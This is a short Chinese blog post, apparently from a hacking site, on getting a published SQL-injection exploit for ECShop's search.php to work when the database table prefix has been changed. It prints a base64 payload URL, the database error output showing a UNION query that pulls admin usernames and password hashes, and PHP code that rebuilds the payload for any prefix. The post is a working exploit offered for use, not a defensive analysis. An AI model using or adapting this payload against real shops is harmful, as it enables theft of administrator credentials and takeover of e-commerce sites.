ECSHOP 搜索注入漏洞出现错误的解决办法!

分类:安全 | 2011-09-23 | 撸过 105 次
0人扯谈

ECSHOP 利用网上的EXP:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

 

 

返回:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT goods_id, COUNT(*) AS num FROM `ccwww`.`ccc_goods_attr` WHERE 0 OR (1 AND attr_id = ‘1’) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'”\’) union select 1#”‘),1 from ecs_admin_user#’ AND attr_value LIKE ‘%1%’ ) GROUP BY goods_id HAVING num = ‘1’ ) [2] => Array ( [error] => Table ‘ccwww.ecs_admin_user’ doesn’t exist ) [3] => Array ( [errno] => 1146 ) )
原因是数据库前缀修改的问题。

解决办法:重新生成EXP变种文件。

用下面的代码生成一个code:

 

<?php
$p=”ecs_”;
$p=isset($_REQUEST[‘pre’])?$_REQUEST[‘pre’]:$p;
$arr=array(“1′) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,’\”\\’) union select 1#\”‘),1 from “.$p.”admin_user#”=>”1”);
$exp = array(“attr”=>$arr);
$exp = base64_encode(serialize($exp));
//echo $exp;
?>
<textarea name=”textarea” id=”textarea” cols=”100″ rows=”5″><?=$exp?></textarea>

 

 

 

以上代码保存为webshell.php,

修改红色的ecs_前缀表改为以本文章为例的蓝色的ccc_前缀表

通过https://www.webshell.cc/webshell.php访问,生成新的BASE64加密文件。

本站内容均为原创,转载请务必保留署名与链接!
ECSHOP 搜索注入漏洞出现错误的解决办法!:https://www.webshell.cc/1459.html
标签: ,

相关日志